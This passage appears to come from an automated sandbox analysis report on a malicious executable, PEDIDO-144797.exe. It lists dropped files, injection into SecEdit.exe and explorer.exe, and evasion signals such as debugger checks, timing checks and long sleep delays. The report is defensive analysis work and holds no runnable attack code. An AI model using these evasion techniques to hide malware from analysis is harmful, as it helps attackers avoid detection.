        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD0DD3 push ds; ret 4_2_02DD0DD4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02DD0DB3 push ebx; iretd 4_2_02DD0DB4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeFile created: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI/Special instruction interceptor: Address: 3B6FC3A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI/Special instruction interceptor: Address: 1E8FC3A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI/Special instruction interceptor: Address: 7FFFAFCF0594
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI/Special instruction interceptor: Address: 7FFFAFCEFF74
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI/Special instruction interceptor: Address: 7FFFAFCED6C4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI/Special instruction interceptor: Address: 7FFFAFCED864
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED144
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCF0594
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED764
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED324
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED364
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED004
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCEFF74
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED6C4
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI/Special instruction interceptor: Address: 7FFFAFCED864
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 rdtsc 2_2_326E1763
        Source: C:\Windows\SysWOW64\SecEdit.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI coverage: 0.5 %
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
        Source: PEDIDO-144797.exe, 00000002.00000002.90087203673.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957706436.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002219442.0000000002440000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91567643029.000000000D86B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.92004260790.000000000D86B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94454931688.000000000D866000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: SecEdit.exe, 00000004.00000002.91632535428.000000000283D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI call chain: ExitProcess graph end nodegraph_0-4671
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeAPI call chain: ExitProcess graph end nodegraph_0-4513
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 rdtsc 2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E34E0 NtCreateMutant,LdrInitializeThunk,2_2_326E34E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275D270 mov eax, dword ptr fs:[00000030h]2_2_3275D270
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]2_2_3273327E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]2_2_3273327E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]2_2_3273327E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]2_2_3273327E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]2_2_3273327E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]2_2_3273327E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B273 mov eax, dword ptr fs:[00000030h]2_2_3269B273
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B273 mov eax, dword ptr fs:[00000030h]2_2_3269B273
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B273 mov eax, dword ptr fs:[00000030h]2_2_3269B273
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF24A mov eax, dword ptr fs:[00000030h]2_2_326CF24A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F247 mov eax, dword ptr fs:[00000030h]2_2_3275F247
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]2_2_3276124C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]2_2_3276124C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]2_2_3276124C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]2_2_3276124C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA22B mov eax, dword ptr fs:[00000030h]2_2_326DA22B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA22B mov eax, dword ptr fs:[00000030h]2_2_326DA22B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA22B mov eax, dword ptr fs:[00000030h]2_2_326DA22B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720227 mov eax, dword ptr fs:[00000030h]2_2_32720227
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720227 mov eax, dword ptr fs:[00000030h]2_2_32720227
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720227 mov eax, dword ptr fs:[00000030h]2_2_32720227
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C0230 mov ecx, dword ptr fs:[00000030h]2_2_326C0230
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272B214 mov eax, dword ptr fs:[00000030h]2_2_3272B214
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272B214 mov eax, dword ptr fs:[00000030h]2_2_3272B214
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A200 mov eax, dword ptr fs:[00000030h]2_2_3269A200
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269821B mov eax, dword ptr fs:[00000030h]2_2_3269821B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D2EC mov eax, dword ptr fs:[00000030h]2_2_3269D2EC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D2EC mov eax, dword ptr fs:[00000030h]2_2_3269D2EC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326972E0 mov eax, dword ptr fs:[00000030h]2_2_326972E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C32C5 mov eax, dword ptr fs:[00000030h]2_2_326C32C5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327732C9 mov eax, dword ptr fs:[00000030h]2_2_327732C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C42AF mov eax, dword ptr fs:[00000030h]2_2_326C42AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C42AF mov eax, dword ptr fs:[00000030h]2_2_326C42AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326992AF mov eax, dword ptr fs:[00000030h]2_2_326992AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3269C2B0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F2AE mov eax, dword ptr fs:[00000030h]2_2_3275F2AE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327692AB mov eax, dword ptr fs:[00000030h]2_2_327692AB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E289 mov eax, dword ptr fs:[00000030h]2_2_3271E289
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7290 mov eax, dword ptr fs:[00000030h]2_2_326A7290
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7290 mov eax, dword ptr fs:[00000030h]2_2_326A7290
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7290 mov eax, dword ptr fs:[00000030h]2_2_326A7290
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720371 mov eax, dword ptr fs:[00000030h]2_2_32720371
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720371 mov eax, dword ptr fs:[00000030h]2_2_32720371
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C237A mov eax, dword ptr fs:[00000030h]2_2_326C237A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32698347 mov eax, dword ptr fs:[00000030h]2_2_32698347
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32698347 mov eax, dword ptr fs:[00000030h]2_2_32698347
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32698347 mov eax, dword ptr fs:[00000030h]2_2_32698347
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA350 mov eax, dword ptr fs:[00000030h]2_2_326DA350
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E328 mov eax, dword ptr fs:[00000030h]2_2_3269E328
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E328 mov eax, dword ptr fs:[00000030h]2_2_3269E328
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E328 mov eax, dword ptr fs:[00000030h]2_2_3269E328
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C332D mov eax, dword ptr fs:[00000030h]2_2_326C332D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773336 mov eax, dword ptr fs:[00000030h]2_2_32773336
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D8322 mov eax, dword ptr fs:[00000030h]2_2_326D8322
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D8322 mov eax, dword ptr fs:[00000030h]2_2_326D8322
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D8322 mov eax, dword ptr fs:[00000030h]2_2_326D8322
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32699303 mov eax, dword ptr fs:[00000030h]2_2_32699303
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32699303 mov eax, dword ptr fs:[00000030h]2_2_32699303
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D631F mov eax, dword ptr fs:[00000030h]2_2_326D631F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE310 mov eax, dword ptr fs:[00000030h]2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE310 mov eax, dword ptr fs:[00000030h]2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE310 mov eax, dword ptr fs:[00000030h]2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F30A mov eax, dword ptr fs:[00000030h]2_2_3275F30A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A63CB mov eax, dword ptr fs:[00000030h]2_2_326A63CB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327243D5 mov eax, dword ptr fs:[00000030h]2_2_327243D5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E3C0 mov eax, dword ptr fs:[00000030h]2_2_3269E3C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E3C0 mov eax, dword ptr fs:[00000030h]2_2_3269E3C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E3C0 mov eax, dword ptr fs:[00000030h]2_2_3269E3C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C3C7 mov eax, dword ptr fs:[00000030h]2_2_3269C3C7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D33D0 mov eax, dword ptr fs:[00000030h]2_2_326D33D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D43D0 mov ecx, dword ptr fs:[00000030h]2_2_326D43D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271C3B0 mov eax, dword ptr fs:[00000030h]2_2_3271C3B0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A93A6 mov eax, dword ptr fs:[00000030h]2_2_326A93A6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A93A6 mov eax, dword ptr fs:[00000030h]2_2_326A93A6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CA390 mov eax, dword ptr fs:[00000030h]2_2_326CA390
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CA390 mov eax, dword ptr fs:[00000030h]2_2_326CA390
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CA390 mov eax, dword ptr fs:[00000030h]2_2_326CA390
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F38A mov eax, dword ptr fs:[00000030h]2_2_3275F38A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32749060 mov eax, dword ptr fs:[00000030h]2_2_32749060
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7072 mov eax, dword ptr fs:[00000030h]2_2_326A7072
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A6074 mov eax, dword ptr fs:[00000030h]2_2_326A6074
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A6074 mov eax, dword ptr fs:[00000030h]2_2_326A6074
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D0044 mov eax, dword ptr fs:[00000030h]2_2_326D0044
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277505B mov eax, dword ptr fs:[00000030h]2_2_3277505B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1051 mov eax, dword ptr fs:[00000030h]2_2_326A1051
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1051 mov eax, dword ptr fs:[00000030h]2_2_326A1051
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D02D mov eax, dword ptr fs:[00000030h]2_2_3269D02D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A8009 mov eax, dword ptr fs:[00000030h]2_2_326A8009
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C5004 mov eax, dword ptr fs:[00000030h]2_2_326C5004
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C5004 mov ecx, dword ptr fs:[00000030h]2_2_326C5004
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2010 mov ecx, dword ptr fs:[00000030h]2_2_326E2010
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DD0F0 mov eax, dword ptr fs:[00000030h]2_2_326DD0F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DD0F0 mov ecx, dword ptr fs:[00000030h]2_2_326DD0F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C0F6 mov eax, dword ptr fs:[00000030h]2_2_3269C0F6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BB0D0 mov eax, dword ptr fs:[00000030h]2_2_326BB0D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327750B7 mov eax, dword ptr fs:[00000030h]2_2_327750B7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E00A5 mov eax, dword ptr fs:[00000030h]2_2_326E00A5
